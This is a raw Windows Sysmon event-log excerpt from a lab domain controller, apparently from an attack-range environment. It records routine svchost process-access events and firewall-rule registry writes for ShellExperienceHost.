13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.727{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.711{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.696{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-4|C=S-1-15-3-15993189-1149757597-3280441496-4094800555|C=S-1-15-3-139472938-1339732804-1469114779-4031155563|C=S-1-15-3-1849407097-1086866290-155560606-3624675039|C=S-1-15-3-2015030808-1290041139-4103196845-2461361948|C=S-1-15-3-2973957182-1175190094-721927306-1883016034|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|M=microsoft.windows.shellexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.ShellExperienceHost_1
0.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|D=C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{36AFAECD-731F-4EAB-BF8E-26ABBDB9CF37}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{CBB5B569-0FDA-4B3E-A63F-0B00D1CA8690}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x800000000000000010635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D197064B-AC84-4E6B-A5DF-2CEEA8695ECB}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 13241300x800000000000000010634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.680{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{241621E7-724D-43AE-A312-0FD919C62C19}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|Desc=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708|EmbedCtxt=@{Microsoft.Windows.ShellExperienceHost_10.0.14393.2068_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}| 
10341000x800000000000000010633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 